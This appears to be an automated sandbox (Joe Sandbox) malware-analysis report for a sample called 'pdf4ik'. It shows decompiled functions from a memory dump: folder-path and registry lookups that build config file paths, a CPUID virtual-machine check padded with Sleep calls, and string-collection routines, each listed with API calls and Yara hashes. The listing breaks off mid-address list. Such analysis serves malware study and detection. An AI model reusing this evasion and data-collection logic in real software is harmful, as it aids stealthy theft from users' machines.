                                        • Opcode Fuzzy Hash: 5103affbf9ebf80334c40a9a17f168540f25626b351b2b9c3477a8428263008b
                                        • Instruction Fuzzy Hash: AB2163B6801209BFDB04DFD8C980ADEBBB8AF64640F60816DE50577A40DB705717EBB6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9F2D0 Relevance: 15.2, APIs: 10, Instructions: 198stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D9F2D0(CHAR* __ecx, CHAR* __edx, intOrPtr __edi, CHAR* _a4) {
				short _v8;
				char _v16;
				signed int _v24;
				char _v288;
				char _v552;
				void* _v1552;
				intOrPtr _v1560;
				char _v1564;
				char _v1580;
				intOrPtr _v1588;
				char _v1592;
				short _v1608;
				char _v1612;
				char _v1616;
				CHAR* _v1620;
				CHAR* _v1624;
				void* __ebx;
				void* __esi;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t85;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t103;
				intOrPtr _t104;
				void* _t109;
				char _t110;
				void* _t111;
				CHAR* _t117;
				intOrPtr _t118;
				intOrPtr _t142;
				void* _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t148;
				signed int _t149;
				void* _t150;
				void* _t154;

				_t142 = __edi;
				_t67 =  *0x29dd5664; // 0xd9555f04
				_t68 = _t67 ^ _t149;
				_v24 = _t68;
				 *[fs:0x0] =  &_v16;
				_t110 = 0;
				_t144 = __edx;
				_v1624 = _a4;
				_v1620 = __ecx;
				_v1612 = 0;
				_v1616 = 0;
				E29DB5640( &_v552, 0, 0x104);
				E29DB5640( &_v1552, 0, 0x3e8);
				lstrcatA( &_v552,  &_v1552 & (0 |  *0x29dd8500(0, 0x1c, 0, 0,  &_v1552, _t68, _t143, _t109,  *[fs:0x0], E29DC41EB, 0xffffffff) < 0x00000000) - 0x00000001);
				lstrcatA( &_v552, _t144);
				E29DB5640( &_v288, 0, 0x104);
				_t154 = _t150 - 0x64c + 0x24;
				lstrcatA( &_v288,  &_v552);
				lstrcatA( &_v288, "\\");
				_t117 =  *0x29dd7d54; // 0x15a1fe0
				lstrcatA( &_v288, _t117);
				_t85 =  &_v288;
				_v1560 = 0xf;
				_v1564 = 0;
				_v1580 = 0;
				_t145 = _t85 + 1;
				do {
					_t118 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t118 != 0);
				E29D892C0( &_v1580,  &_v288, _t85 - _t145);
				_v8 = 0;
				_t90 = E29DA4990( &_v1580,  &_v1608,  &_v1608);
				if(_t90[0xa] >= 8) {
					_t90 =  *_t90;
				}
				_t91 = GetFileAttributesW(_t90);
				if(_t91 == 0xffffffff || (_t91 & 0x00000010) != 0) {
					_t146 = 0;
				} else {
					_t146 = 1;
				}
				if(_v1588 >= 8) {
					_push(_v1608);
					E29DADF3B();
					_t154 = _t154 + 4;
				}
				_v8 = 0xffffffff;
				_v1588 = 7;
				_v1592 = _t110;
				_v1608 = 0;
				if(_v1560 >= 0x10) {
					_push(_v1580);
					E29DADF3B();
					_t154 = _t154 + 4;
				}
				_v1560 = 0xf;
				_v1564 = _t110;
				_v1580 = _t110;
				if(_t146 != _t110 && E29D99300( &_v1612,  &_v1616,  &_v288) == 0) {
					_t103 = _v1612;
					if(_t103 != _t110) {
						 *0x29dd8464(_t103, _t110);
						_v1612 = _t110;
					}
					_t104 = _v1616;
					if(_t104 != _t110) {
						 *0x29dd8518(_t104);
					}
					_v1612 = _t110;
					_v1616 = _t110;
				}
				_t138 = _v1616;
				_t147 = _v1624;
				E29D9B520(_t142, 0x29dcd617,  &_v552, _v1624, _v1612, _v1616,  *((intOrPtr*)(_t142 + 0x20)), _v1620, _t110);
				if( *((intOrPtr*)(_t142 + 6)) != _t110) {
					E29D9E9B0( &_v552, _t147, _t142, _t110);
					_t110 = 0;
				}
				_t96 = _v1612;
				if(_t96 != _t110) {
					 *0x29dd8464(_t96, _t110);
					_v1612 = _t110;
				}
				_t97 = _v1616;
				if(_t97 != _t110) {
					_t97 =  *0x29dd8518(_t97);
				}
				 *[fs:0x0] = _v16;
				_pop(_t148);
				_pop(_t111);
				return E29DADF46(_t97, _t111, _v24 ^ _t149, _t138, _t142, _t148);
			}












































                                        0x29d9f2d0
                                        0x29d9f2e7
                                        0x29d9f2ec
                                        0x29d9f2ee
                                        0x29d9f2f7
                                        0x29d9f300
                                        0x29d9f307
                                        0x29d9f311
                                        0x29d9f317
                                        0x29d9f31d
                                        0x29d9f323
                                        0x29d9f329
                                        0x29d9f33e
                                        0x29d9f370
                                        0x29d9f37e
                                        0x29d9f391
                                        0x29d9f396
                                        0x29d9f3a7
                                        0x29d9f3b9
                                        0x29d9f3bf
                                        0x29d9f3cd
                                        0x29d9f3d3
                                        0x29d9f3d9
                                        0x29d9f3e3
                                        0x29d9f3e9
                                        0x29d9f3ef
                                        0x29d9f3f2
                                        0x29d9f3f2
                                        0x29d9f3f4
                                        0x29d9f3f5
                                        0x29d9f409
                                        0x29d9f41b
                                        0x29d9f41e
                                        0x29d9f427
                                        0x29d9f429
                                        0x29d9f429
                                        0x29d9f42c
                                        0x29d9f435
                                        0x29d9f442
                                        0x29d9f43b
                                        0x29d9f43b
                                        0x29d9f43b
                                        0x29d9f44b
                                        0x29d9f453
                                        0x29d9f454
                                        0x29d9f459
                                        0x29d9f459
                                        0x29d9f45e
                                        0x29d9f46c
                                        0x29d9f476
                                        0x29d9f47c
                                        0x29d9f483
                                        0x29d9f48b
                                        0x29d9f48c
                                        0x29d9f491
                                        0x29d9f491
                                        0x29d9f494
                                        0x29d9f49e
                                        0x29d9f4a4
                                        0x29d9f4ac
                                        0x29d9f4cd
                                        0x29d9f4d5
                                        0x29d9f4d9
                                        0x29d9f4df
                                        0x29d9f4df
                                        0x29d9f4e5
                                        0x29d9f4ed
                                        0x29d9f4f0
                                        0x29d9f4f0
                                        0x29d9f4f6
                                        0x29d9f4fc
                                        0x29d9f4fc
                                        0x29d9f50b
                                        0x29d9f511
                                        0x29d9f531
                                        0x29d9f539
                                        0x29d9f545
                                        0x29d9f54a
                                        0x29d9f54a
                                        0x29d9f54c
                                        0x29d9f554
                                        0x29d9f558
                                        0x29d9f55e
                                        0x29d9f55e
                                        0x29d9f564
                                        0x29d9f56c
                                        0x29d9f56f
                                        0x29d9f56f
                                        0x29d9f578
                                        0x29d9f580
                                        0x29d9f581
                                        0x29d9f58f

                                        APIs
                                        • _memset.LIBCMT ref: 29D9F329
                                        • _memset.LIBCMT ref: 29D9F33E
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F352
                                        • lstrcatA.KERNEL32(?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F370
                                        • lstrcatA.KERNEL32(?,01596BD8,?,?,?,D9555F04,01599110,00000000), ref: 29D9F37E
                                        • _memset.LIBCMT ref: 29D9F391
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3A7
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3B9
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F3CD
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,D9555F04,01599110,00000000), ref: 29D9F42C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFileFolderPath
                                        • String ID:
                                        • API String ID: 3917447719-0
                                        • Opcode ID: 86ff8985201db34bcf75999a53eb7551611a6ea56a67eff9b6af62b10602256f
                                        • Instruction ID: 61d6e8dd11226d0879bcc8034a20c97e4da5fa0108b46892c7a3acee3dba199d
                                        • Opcode Fuzzy Hash: 86ff8985201db34bcf75999a53eb7551611a6ea56a67eff9b6af62b10602256f
                                        • Instruction Fuzzy Hash: E87180B2901218AFDB24EF54CC84BDAB7B9EF98310F0081EDE509A7640DA359E95DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D81090 Relevance: 15.1, APIs: 12, Instructions: 56sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E29D81090(long __edx) {
				long* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				long _t17;
				long _t21;
				long* _t23;

				_t21 = __edx;
				_v24 = 0xffffffff;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				Sleep(1);
				Sleep(1);
				Sleep(1);
				Sleep(1);
				_v8 =  &_v24;
				Sleep(1);
				Sleep(1);
				Sleep(1);
				Sleep(1);
				_t23 = _v8;
				asm("cpuid");
				 *_t23 = 1;
				_t23[1] = _t17;
				_t23[2] = 0;
				_t23[3] = _t21;
				Sleep(1);
				Sleep(1);
				Sleep(1);
				Sleep(1);
				return _v16 >> 0x0000001f & 0x00000001;
			}











                                        0x29d81090
                                        0x29d810a3
                                        0x29d810aa
                                        0x29d810ad
                                        0x29d810b0
                                        0x29d810b3
                                        0x29d810b7
                                        0x29d810bb
                                        0x29d810bf
                                        0x29d810c6
                                        0x29d810c9
                                        0x29d810cd
                                        0x29d810d1
                                        0x29d810d5
                                        0x29d810d7
                                        0x29d810e1
                                        0x29d810e3
                                        0x29d810e5
                                        0x29d810e8
                                        0x29d810eb
                                        0x29d810f0
                                        0x29d810f4
                                        0x29d810f8
                                        0x29d810fc
                                        0x29d81110

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: a3d4511a35a1d0cdb97c72efdda9935c89c109b1ce38a8f932a8587f3474c30b
                                        • Instruction ID: cf5b653bc14dd41e4a7b1e93b7a97be837d8d4ec131ef068e510fb1282180e19
                                        • Opcode Fuzzy Hash: a3d4511a35a1d0cdb97c72efdda9935c89c109b1ce38a8f932a8587f3474c30b
                                        • Instruction Fuzzy Hash: 90012D71A403486ED720BBAA8C06FDEBAE4EFC4710F11415AE5599B2C2D9F265808EA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D93CE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E29D93CE0(void* __ebx, void* __edi) {
				signed int _v8;
				char _v276;
				char _v531;
				char _v532;
				void* _v536;
				int _v540;
				void* __esi;
				signed int _t17;
				intOrPtr _t27;
				intOrPtr _t31;
				void* _t39;
				intOrPtr _t43;
				intOrPtr _t44;
				char* _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				char* _t53;
				void* _t54;
				signed int _t57;

				_t54 = __edi;
				_t39 = __ebx;
				_t17 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t17 ^ _t57;
				_v540 = 0xff;
				_v532 = 0;
				E29DB5640( &_v531, 0, 0xfe);
				_t48 =  *0x29dd7e1c; // 0x15a5560
				if(RegOpenKeyExA(0x80000001, _t48, 0, 0x20119,  &_v536) == 0) {
					_t53 =  *0x29dd81ac; // 0x15a5e60
					RegQueryValueExA(_v536, _t53, 0, 0,  &_v532,  &_v540);
				}
				RegCloseKey(_v536);
				E29DB5640( &_v276, 0, 0x104);
				lstrcatA( &_v276,  &_v532);
				lstrcatA( &_v276, "\\config\\");
				_t27 =  *0x29dd7b18; // 0x15a5058
				E29D93B60(_t39,  &_v532, _t27);
				_t43 =  *0x29dd7da8; // 0x15a5cb0
				_t56 =  &_v276;
				E29D93B60(_t39,  &_v276, _t43);
				_t51 =  *0x29dd7abc; // 0x15a5660
				E29D93B60(_t39,  &_v276, _t51);
				_t31 =  *0x29dd8268; // 0x15970d8
				E29D93B60(_t39,  &_v276, _t31);
				_t44 =  *0x29dd7e08; // 0x15a5820
				E29D93B60(_t39, _t56, _t44);
				_t52 =  *0x29dd800c; // 0x15a5cf8
				return E29DADF46(E29D93B60(_t39, _t56, _t52), _t39, _v8 ^ _t57, _t52, _t54, _t56);
			}






















                                        0x29d93ce0
                                        0x29d93ce0
                                        0x29d93ce9
                                        0x29d93cf0
                                        0x29d93d02
                                        0x29d93d0c
                                        0x29d93d13
                                        0x29d93d18
                                        0x29d93d3d
                                        0x29d93d3f
                                        0x29d93d5f
                                        0x29d93d5f
                                        0x29d93d6c
                                        0x29d93d80
                                        0x29d93d96
                                        0x29d93da8
                                        0x29d93dae
                                        0x29d93dba
                                        0x29d93dbf
                                        0x29d93dc9
                                        0x29d93dcf
                                        0x29d93dd4
                                        0x29d93dde
                                        0x29d93de3
                                        0x29d93dec
                                        0x29d93df1
                                        0x29d93dfb
                                        0x29d93e00
                                        0x29d93e20

                                        APIs
                                        • _memset.LIBCMT ref: 29D93D13
                                        • RegOpenKeyExA.ADVAPI32(80000001,015A5560,00000000,00020119,?), ref: 29D93D35
                                        • RegQueryValueExA.ADVAPI32(?,015A5E60,00000000,00000000,00000000,000000FF), ref: 29D93D5F
                                        • RegCloseKey.ADVAPI32(?), ref: 29D93D6C
                                        • _memset.LIBCMT ref: 29D93D80
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D93D96
                                        • lstrcatA.KERNEL32(?,\config\), ref: 29D93DA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memsetlstrcat$CloseOpenQueryValue
                                        • String ID: \config\
                                        • API String ID: 1663104428-327132148
                                        • Opcode ID: 85ce363bb4925ad275b611bbd7e0501685aa7e1f2b06e1789570ebeb8672e27b
                                        • Instruction ID: 2c8a79304f01ee0a83b3e498784bb48e8e2b4e9e41f8ccec97061ac79d6f6c77
                                        • Opcode Fuzzy Hash: 85ce363bb4925ad275b611bbd7e0501685aa7e1f2b06e1789570ebeb8672e27b
                                        • Instruction Fuzzy Hash: 413107B298011CABD710FB54DC85FEB7338EB14B08F00859CF60A67180DA74AA95EBF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9D7E6 Relevance: 13.6, APIs: 9, Instructions: 136memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 73%
                                        			E29D9D7E6(void* __esi, void* __eflags) {
				long __ebx;
				void* _t61;
				void* _t63;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t72;

				_t70 = __esi;
				while(1) {
					__edx = __ebp - 0x84;
					__ecx = __ebp - 0x88;
					__edx = __esi;
					 *((intOrPtr*)(__ebp - 0xa0)) = E29D9D160(__ebp - 0x88, __esi, __ebp - 0x84);
					GetProcessHeap() = HeapFree(__eax, __ebx, __esi);
					__edi =  *(__ebp - 0x88);
					__eax = GetProcessHeap();
					__eax = HeapAlloc(__eax, 8,  *(__ebp - 0x88));
					 *(__ebp - 0x94) = __eax;
					if(__eax == __ebx) {
						break;
					}
					__esi =  *(__ebp - 0x84);
					__eax = E29DAE6AF(__eax, __edi, __esi);
					if(__esi != __ebx) {
						__eax = GetProcessHeap();
						__eax = HeapFree(__eax, __ebx, __esi);
						 *(__ebp - 0x84) = __ebx;
					}
					__bl =  *((intOrPtr*)(__ebp - 0xa0));
					__esi = __ebp - 0x48;
					__eax =  *(__ebp - 0x90);
					__esi =  *(__ebp - 0x94);
					__eax =  *(__ebp - 0x90) + 1;
					__ebx = 0;
					 *(__ebp - 0x90) = __eax;
					if(__eax <  *((intOrPtr*)(__ebp - 0x98))) {
						continue;
					} else {
						if( *((intOrPtr*)(__ebp - 0x9c)) != 0xff) {
							L14:
							GetProcessHeap() = HeapFree(__eax, __ebx, __esi);
							__eax =  *(__ebp - 0x8c);
							 *((intOrPtr*)(__eax + 0x14)) = 0xf;
							 *(__eax + 0x10) = __ebx;
							__edi = __ebp - 0x48;
							__esi = __eax;
							 *__eax = __bl;
							__eax = E29D891D0(__edi, __eax);
							__esi = 0x10;
							if( *((intOrPtr*)(__ebp - 0x18)) >= 0x10) {
								__eax =  *(__ebp - 0x2c);
								_push( *(__ebp - 0x2c));
								__eax = E29DADF3B();
								__esp = __esp + 4;
							}
							 *((intOrPtr*)(__ebp - 0x18)) = 0xf;
							 *(__ebp - 0x1c) = __ebx;
							 *(__ebp - 0x2c) = __bl;
							if( *((intOrPtr*)(__ebp - 0x34)) >= __esi) {
								__ecx =  *(__ebp - 0x48);
								_push( *(__ebp - 0x48));
								__eax = E29DADF3B();
								__esp = __esp + 4;
							}
							__eax =  *(__ebp - 0x8c);
							L19:
							 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
							_pop(_t69);
							_pop(_t71);
							_pop(_t63);
							return E29DADF46(_t61, _t63,  *(_t72 - 0x10) ^ _t72, _t68, _t69, _t71);
						}
						__edx =  *(__ebp - 0xa8);
						__ecx = __ebp - 0x64;
						__edi = E29D89100(__ebp - 0x64,  *(__ebp - 0xa8));
						__esi = __ebp - 0x2c;
						 *((char*)(__ebp - 4)) = 3;
						__eax = E29D891D0(__eax, __ebp - 0x2c);
						 *((char*)(__ebp - 4)) = 1;
						if( *((intOrPtr*)(__ebp - 0x50)) >= 0x10) {
							__eax =  *(__ebp - 0x64);
							_push( *(__ebp - 0x64));
							__eax = E29DADF3B();
							__esp = __esp + 4;
						}
						__eax =  *(__ebp - 0xa4);
						__ecx = __eax;
						__esi = __ecx + 1;
						do {
							__dl =  *__ecx;
							__ecx = __ecx + 1;
						} while (__dl != __bl);
						__ecx = __ecx - __esi;
						__ecx = __ebp - 0x2c;
						__eax = E29D95540(__eax, __ebp - 0x2c, __ebp - 0x2c);
						__ecx =  *(__ebp - 0x38);
						__ecx =  *(__ebp - 0x1c);
						__esi = __ebp - 0x64;
						__edx = __ebp - 0x48;
						__edi = E29D951E0( *(__ebp - 0x1c), __ebp - 0x48, __ebp - 0x64,  *(__ebp - 0x38));
						__esi = __ebp - 0x48;
						 *((char*)(__ebp - 4)) = 4;
						__eax = E29D891D0(__eax, __ebp - 0x48);
						 *((char*)(__ebp - 4)) = 1;
						if( *((intOrPtr*)(__ebp - 0x50)) >= 0x10) {
							__edx =  *(__ebp - 0x64);
							_push( *(__ebp - 0x64));
							__eax = E29DADF3B();
							__esp = __esp + 4;
						}
						__esi =  *(__ebp - 0x94);
						 *((intOrPtr*)(__ebp - 0x50)) = 0xf;
						 *(__ebp - 0x54) = __ebx;
						 *(__ebp - 0x64) = __bl;
						goto L14;
					}
				}
				__eax =  *(__ebp - 0x84);
				if( *(__ebp - 0x84) != __ebx) {
					GetProcessHeap() = HeapFree(__eax, __ebx, __eax);
				}
				__esi =  *(__ebp - 0x8c);
				__ecx = __esi;
				__eax = E29D89100(__ecx, 0x29dcd617);
				__edi = 0x10;
				if( *((intOrPtr*)(__ebp - 0x18)) >= 0x10) {
					__eax =  *(__ebp - 0x2c);
					_push( *(__ebp - 0x2c));
					__eax = E29DADF3B();
					__esp = __esp + 4;
				}
				 *((intOrPtr*)(__ebp - 0x18)) = 0xf;
				 *(__ebp - 0x1c) = __ebx;
				 *(__ebp - 0x2c) = __bl;
				if( *((intOrPtr*)(__ebp - 0x34)) < __edi) {
					_t61 = _t70;
				} else {
					__ecx =  *(__ebp - 0x48);
					_push( *(__ebp - 0x48));
					__eax = E29DADF3B();
					__esp = __esp + 4;
					__eax = __esi;
				}
				goto L19;
			}











                                        0x29d9d7e6
                                        0x29d9d7f0
                                        0x29d9d7f0
                                        0x29d9d7f7
                                        0x29d9d7fd
                                        0x29d9d806
                                        0x29d9d813
                                        0x29d9d819
                                        0x29d9d822
                                        0x29d9d829
                                        0x29d9d82f
                                        0x29d9d837
                                        0x00000000
                                        0x00000000
                                        0x29d9d83d
                                        0x29d9d846
                                        0x29d9d850
                                        0x29d9d854
                                        0x29d9d85b
                                        0x29d9d861
                                        0x29d9d861
                                        0x29d9d867
                                        0x29d9d86d
                                        0x29d9d875
                                        0x29d9d87b
                                        0x29d9d881
                                        0x29d9d882
                                        0x29d9d884
                                        0x29d9d890
                                        0x00000000
                                        0x29d9d896
                                        0x29d9d8a0
                                        0x29d9d93f
                                        0x29d9d948
                                        0x29d9d94e
                                        0x29d9d954
                                        0x29d9d95b
                                        0x29d9d95e
                                        0x29d9d961
                                        0x29d9d963
                                        0x29d9d965
                                        0x29d9d96a
                                        0x29d9d972
                                        0x29d9d974
                                        0x29d9d977
                                        0x29d9d978
                                        0x29d9d97d
                                        0x29d9d97d
                                        0x29d9d980
                                        0x29d9d987
                                        0x29d9d98a
                                        0x29d9d990
                                        0x29d9d992
                                        0x29d9d995
                                        0x29d9d996
                                        0x29d9d99b
                                        0x29d9d99b
                                        0x29d9d99e
                                        0x29d9d9a4
                                        0x29d9d9a7
                                        0x29d9d9af
                                        0x29d9d9b0
                                        0x29d9d9b1
                                        0x29d9d9bf
                                        0x29d9d9bf
                                        0x29d9d8a6
                                        0x29d9d8ad
                                        0x29d9d8b5
                                        0x29d9d8b7
                                        0x29d9d8ba
                                        0x29d9d8be
                                        0x29d9d8c3
                                        0x29d9d8cb
                                        0x29d9d8cd
                                        0x29d9d8d0
                                        0x29d9d8d1
                                        0x29d9d8d6
                                        0x29d9d8d6
                                        0x29d9d8d9
                                        0x29d9d8df
                                        0x29d9d8e1
                                        0x29d9d8e4
                                        0x29d9d8e4
                                        0x29d9d8e6
                                        0x29d9d8e7
                                        0x29d9d8eb
                                        0x29d9d8ee
                                        0x29d9d8f1
                                        0x29d9d8f6
                                        0x29d9d8fa
                                        0x29d9d8fd
                                        0x29d9d900
                                        0x29d9d908
                                        0x29d9d90a
                                        0x29d9d90d
                                        0x29d9d911
                                        0x29d9d916
                                        0x29d9d91e
                                        0x29d9d920
                                        0x29d9d923
                                        0x29d9d924
                                        0x29d9d929
                                        0x29d9d929
                                        0x29d9d92c
                                        0x29d9d932
                                        0x29d9d939
                                        0x29d9d93c
                                        0x00000000
                                        0x29d9d93c
                                        0x29d9d890
                                        0x29d9d9c2
                                        0x29d9d9ca
                                        0x29d9d9d5
                                        0x29d9d9d5
                                        0x29d9d9db
                                        0x29d9d9e6
                                        0x29d9d9e8
                                        0x29d9d9ed
                                        0x29d9d9f5
                                        0x29d9d9f7
                                        0x29d9d9fa
                                        0x29d9d9fb
                                        0x29d9da00
                                        0x29d9da00
                                        0x29d9da03
                                        0x29d9da0a
                                        0x29d9da0d
                                        0x29d9da13
                                        0x29d9d5e9
                                        0x29d9da19
                                        0x29d9da19
                                        0x29d9da1c
                                        0x29d9da1d
                                        0x29d9da22
                                        0x29d9da25
                                        0x29d9da25
                                        0x00000000

                                        APIs
                                          • Part of subcall function 29D9D160: lstrlenA.KERNEL32(?,D9555F04,?,?,00000000), ref: 29D9D1C4
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000), ref: 29D9D80C
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D813
                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 29D9D822
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D829
                                        • _strcpy_s.LIBCMT ref: 29D9D846
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 29D9D854
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 29D9D85B
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 29D9D941
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D948
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 29D9D9CE
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 29D9D9D5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$Free$Alloc_strcpy_slstrlen
                                        • String ID:
                                        • API String ID: 379925753-0
                                        • Opcode ID: 79067baad3cbfe766110a74abf692e44946dc6a4ca93d7d344c27770a28b4d1e
                                        • Instruction ID: d59f475baeb727a1ce243fc8e9aac49854dabe85ca7ccd81677ca231fc333ea4
                                        • Opcode Fuzzy Hash: 79067baad3cbfe766110a74abf692e44946dc6a4ca93d7d344c27770a28b4d1e
                                        • Instruction Fuzzy Hash: 94515D72D00258AFDF15EFA4C848BDEBB74BF15300F04849DE54A67601DB356A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D85590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 55%
                                        			E29D85590(void* __eflags, char* _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				intOrPtr _v32;
				CHAR* _v36;
				CHAR* _v52;
				char _v56;
				intOrPtr _v68;
				CHAR* _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t41;
				CHAR* _t48;
				CHAR* _t50;
				CHAR* _t52;
				CHAR* _t54;
				CHAR* _t56;
				CHAR* _t58;
				CHAR* _t61;
				void* _t64;
				CHAR* _t74;
				CHAR* _t75;
				char _t78;
				void* _t79;
				CHAR* _t83;
				void* _t84;
				signed int _t85;
				void* _t86;
				void* _t87;

				_push(0xffffffff);
				_push(E29DC31A0);
				_push( *[fs:0x0]);
				_t87 = _t86 - 0x38;
				_t40 =  *0x29dd5664; // 0xd9555f04
				_t41 = _t40 ^ _t85;
				_v24 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v16;
				_t76 =  &_v72;
				E29D85090( &_v56,  &_v72, _a4);
				_t83 = 0;
				_v8 = 0;
				_t78 = _v56;
				if(_t78 > 0) {
					_t48 =  *0x29dd82d4; // 0x0
					lstrcatA(_t48, "\n");
					if(_t78 > 0) {
						_v56 = _t78;
						do {
							_t13 =  &(_v72[4]); // 0x4
							_t50 = _t83 + _t13;
							if( *((intOrPtr*)(_t83 +  &(_v72[0x18]))) >= 0x10) {
								_t50 =  *_t50;
							}
							_t76 =  *0x29dd82d4; // 0x0
							lstrcatA(_t76, _t50);
							_t52 =  *0x29dd82d4; // 0x0
							lstrcatA(_t52, " : ");
							_t54 = _v72;
							if( *((intOrPtr*)(_t83 + _t54)) == 4) {
								_t56 = E29DA4720( &_v52, __eflags,  *((intOrPtr*)(_t83 + _t54 + 0x40)));
								_v8 = 1;
								__eflags = _t56[0x14] - 0x10;
								if(_t56[0x14] >= 0x10) {
									_t56 =  *_t56;
								}
								_t74 =  *0x29dd82d4; // 0x0
								lstrcatA(_t74, _t56);
								_v8 = 0;
								__eflags = _v32 - 0x10;
								if(__eflags >= 0) {
									_t76 = _v52;
									_push(_v52);
									E29DADF3B();
									_t87 = _t87 + 4;
								}
								_t58 =  *0x29dd82d4; // 0x0
								_push("\n");
								_v32 = 0xf;
								_v36 = 0;
								_v52 = 0;
								_push(_t58);
							} else {
								_t19 = _t54 + 0x20; // 0x20
								_t61 = _t83 + _t19;
								if( *((intOrPtr*)(_t83 + _t54 + 0x34)) >= 0x10) {
									_t61 =  *_t61;
								}
								_t75 =  *0x29dd82d4; // 0x0
								lstrcatA(_t75, _t61);
								_t76 =  *0x29dd82d4; // 0x0
								_push("\n");
								_push(_t76);
							}
							lstrcatA();
							_t83 = _t83 + 0x44;
							_t31 =  &_v56;
							 *_t31 = _v56 - 1;
						} while ( *_t31 != 0);
					}
				}
				_t45 = _v72;
				if(_v72 != 0) {
					_push(_v56);
					E29D89DB0(_t45, _v68);
					_t76 = _v72;
					_push(_v72);
					_t45 = E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t79);
				_pop(_t84);
				_pop(_t64);
				return E29DADF46(_t45, _t64, _v24 ^ _t85, _t76, _t79, _t84);
			}


































                                        0x29d85593
                                        0x29d85595
                                        0x29d855a0
                                        0x29d855a1
                                        0x29d855a4
                                        0x29d855a9
                                        0x29d855ab
                                        0x29d855b1
                                        0x29d855b5
                                        0x29d855bf
                                        0x29d855c5
                                        0x29d855ca
                                        0x29d855cc
                                        0x29d855cf
                                        0x29d855d4
                                        0x29d855da
                                        0x29d855e5
                                        0x29d855ed
                                        0x29d855f3
                                        0x29d855fb
                                        0x29d85602
                                        0x29d85602
                                        0x29d85606
                                        0x29d85608
                                        0x29d85608
                                        0x29d8560a
                                        0x29d85612
                                        0x29d85618
                                        0x29d85623
                                        0x29d85629
                                        0x29d85630
                                        0x29d85662
                                        0x29d85667
                                        0x29d8566b
                                        0x29d8566e
                                        0x29d85670
                                        0x29d85670
                                        0x29d85672
                                        0x29d8567a
                                        0x29d85682
                                        0x29d85685
                                        0x29d85688
                                        0x29d8568a
                                        0x29d8568d
                                        0x29d8568e
                                        0x29d85693
                                        0x29d85693
                                        0x29d85696
